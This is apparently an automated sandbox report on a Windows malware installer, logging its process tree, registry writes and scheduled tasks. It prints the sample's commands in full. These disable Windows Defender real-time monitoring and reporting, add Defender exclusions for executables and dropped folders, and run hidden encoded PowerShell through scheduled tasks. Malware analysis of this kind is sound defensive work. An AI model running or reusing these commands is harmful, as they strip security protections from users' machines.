\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs JWGWblk.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-6f-95-f3-cd-55\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{97EB7239-D914-4682-A759-785A2819D5A6} JWGWblk.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-6f-95-f3-cd-55\WpadDecisionReason = "1" JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad JWGWblk.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{97EB7239-D914-4682-A759-785A2819D5A6}\WpadDecision = "0" JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates JWGWblk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople JWGWblk.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2608 schtasks.exe 2804 schtasks.exe 1288 schtasks.exe 1532 schtasks.exe 2420 schtasks.exe 900 schtasks.exe 1704 schtasks.exe 1672 schtasks.exe 1636 schtasks.exe 1564 schtasks.exe 2772 schtasks.exe 2736 schtasks.exe 2616 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 3020 powershell.EXE 3020 powershell.EXE 3020 powershell.EXE 1608 powershell.EXE 1608 powershell.EXE 1608 powershell.EXE 1304 powershell.EXE 1304 powershell.EXE 1304 powershell.EXE 2312 powershell.EXE 2312 powershell.EXE 2312 powershell.EXE 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe 1012 JWGWblk.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3020 powershell.EXE Token: SeDebugPrivilege 1608 powershell.EXE Token: SeDebugPrivilege 1304 powershell.EXE Token: SeDebugPrivilege 2312 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2188 wrote to memory of 2700 2188 afc500c.exe 30 PID 2188 wrote to memory of 2700 2188 afc500c.exe 30 PID 2188 wrote to memory of 2700 2188 afc500c.exe 30 PID 2188 wrote to memory of 2700 2188 afc500c.exe 30 PID 2188 wrote to memory of 2700 2188 afc500c.exe 30 PID 2188 wrote to memory of 2700 2188 afc500c.exe 30 PID 2188 wrote to memory of 2700 2188 afc500c.exe 30 PID 2700 wrote to memory of 2956 2700 Install.exe 31 PID 2700 wrote to memory of 2956 2700 Install.exe 31 PID 2700 wrote to memory of 2956 2700 Install.exe 31 PID 2700 wrote to memory of 2956 2700 Install.exe 31 PID 2700 wrote to memory of 2956 2700 Install.exe 31 PID 2700 wrote to memory of 2956 2700 Install.exe 31 PID 2700 wrote to memory of 2956 2700 Install.exe 31 PID 2956 wrote to memory of 2720 2956 Install.exe 33 PID 2956 wrote to memory of 2720 2956 Install.exe 33 PID 2956 wrote to memory of 2720 2956 Install.exe 33 PID 2956 wrote to memory of 2720 2956 Install.exe 33 PID 2956 wrote to memory of 2720 2956 Install.exe 33 PID 2956 wrote to memory of 2720 2956 Install.exe 33 PID 2956 wrote to memory of 2720 2956 Install.exe 33 PID 2956 wrote to memory of 2556 2956 Install.exe 35 PID 2956 wrote to memory of 2556 2956 Install.exe 35 PID 2956 wrote to memory of 2556 2956 Install.exe 35 PID 2956 wrote to memory of 2556 2956 Install.exe 35 PID 2956 wrote to memory of 2556 2956 Install.exe 35 PID 2956 wrote to memory of 2556 2956 Install.exe 35 PID 2956 wrote to memory of 2556 2956 Install.exe 35 PID 2720 wrote to memory of 2584 2720 forfiles.exe 37 PID 2720 wrote to memory of 2584 2720 forfiles.exe 37 PID 2720 wrote to memory of 2584 2720 forfiles.exe 37 PID 2720 wrote to memory of 2584 2720 forfiles.exe 37 PID 2720 wrote to memory of 2584 2720 forfiles.exe 37 PID 2720 wrote to memory of 2584 2720 forfiles.exe 37 PID 2720 wrote to memory of 2584 2720 forfiles.exe 37 PID 2556 wrote to memory of 2616 2556 forfiles.exe 38 PID 2556 wrote to memory of 2616 2556 forfiles.exe 38 PID 2556 wrote to memory of 2616 2556 forfiles.exe 38 PID 2556 wrote to memory of 2616 2556 forfiles.exe 38 PID 2556 wrote to memory of 2616 2556 forfiles.exe 38 PID 2556 wrote to memory of 2616 2556 forfiles.exe 38 PID 2556 wrote to memory of 2616 2556 forfiles.exe 38 PID 2584 wrote to memory of 2628 2584 cmd.exe 39 PID 2584 wrote to memory of 2628 2584 cmd.exe 39 PID 2584 wrote to memory of 2628 2584 cmd.exe 39 PID 2584 wrote to memory of 2628 2584 cmd.exe 39 PID 2584 wrote to memory of 2628 2584 cmd.exe 39 PID 2584 wrote to memory of 2628 2584 cmd.exe 39 PID 2584 wrote to memory of 2628 2584 cmd.exe 39 PID 2616 wrote to memory of 812 2616 cmd.exe 40 PID 2616 wrote to memory of 812 2616 cmd.exe 40 PID 2616 wrote to memory of 812 2616 cmd.exe 40 PID 2616 wrote to memory of 812 2616 cmd.exe 40 PID 2616 wrote to memory of 812 2616 cmd.exe 40 PID 2616 wrote to memory of 812 2616 cmd.exe 40 PID 2616 wrote to memory of 812 2616 cmd.exe 40 PID 2584 wrote to memory of 3024 2584 cmd.exe 41 PID 2584 wrote to memory of 3024 2584 cmd.exe 41 PID 2584 wrote to memory of 3024 2584 cmd.exe 41 PID 2584 wrote to memory of 3024 2584 cmd.exe 41 PID 2584 wrote to memory of 3024 2584 cmd.exe 41 PID 2584 wrote to memory of 3024 2584 cmd.exe 41 PID 2584 wrote to memory of 3024 2584 cmd.exe 41 PID 2616 wrote to memory of 2240 2616 cmd.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\afc500c.exe"C:\Users\Admin\AppData\Local\Temp\afc500c.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\7zSF41F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\7zSF631.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2628
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
- System Location Discovery: System Language Discovery
PID:3024
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2616 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:812
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2240
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBiopKMZs" /SC once /ST 04:19:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBiopKMZs"4⤵
- System Location Discovery: System Language Discovery
PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBiopKMZs"4⤵
- System Location Discovery: System Language Discovery
PID:2876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIqjSKjLtvGhSJBNfA" /SC once /ST 18:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\GuxHFDR.exe\" ik /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1636
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AD1303F8-3ECB-46AE-83DD-3C4DFAA35A1F} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵PID:2912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2148
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1748
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2840
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2556
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:600
-
C:\Windows\system32\taskeng.exetaskeng.exe {B48BD08E-A97D-4E73-B077-6A5CA34D1D46} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2080
-
C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\GuxHFDR.exeC:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce\dWLAMXehBrRmAUd\GuxHFDR.exe ik /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1940 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGswowORp" /SC once /ST 07:03:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGswowORp"3⤵PID:876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGswowORp"3⤵PID:2484
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1784
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2104 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2172
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "golVOgxGF" /SC once /ST 00:12:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "golVOgxGF"3⤵PID:1992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "golVOgxGF"3⤵
- System Location Discovery: System Language Discovery
PID:1360
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:323⤵PID:1532
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:643⤵PID:3044
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1796 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:324⤵PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2368 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\dwSOvWKysCpEXQRJ\CFGUGlwq\JNJdrPykbGfDMCMr.wsf"3⤵PID:3020
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\dwSOvWKysCpEXQRJ\CFGUGlwq\JNJdrPykbGfDMCMr.wsf"3⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1632 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xQNizQXsNpkyKPuIghR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TUiypwAeSPRUPoVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\TUiypwAeSPRUPoVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OBIEeKtMHilfBZfce" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\dwSOvWKysCpEXQRJ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:324⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CbVqBnigU" /t REG_DWORD /d 0 /reg:644⤵PID:2160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LfKWeIlHqQBU2" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ardKySDqUVkhC" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIcdGsFSuyUn" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2460
-
-
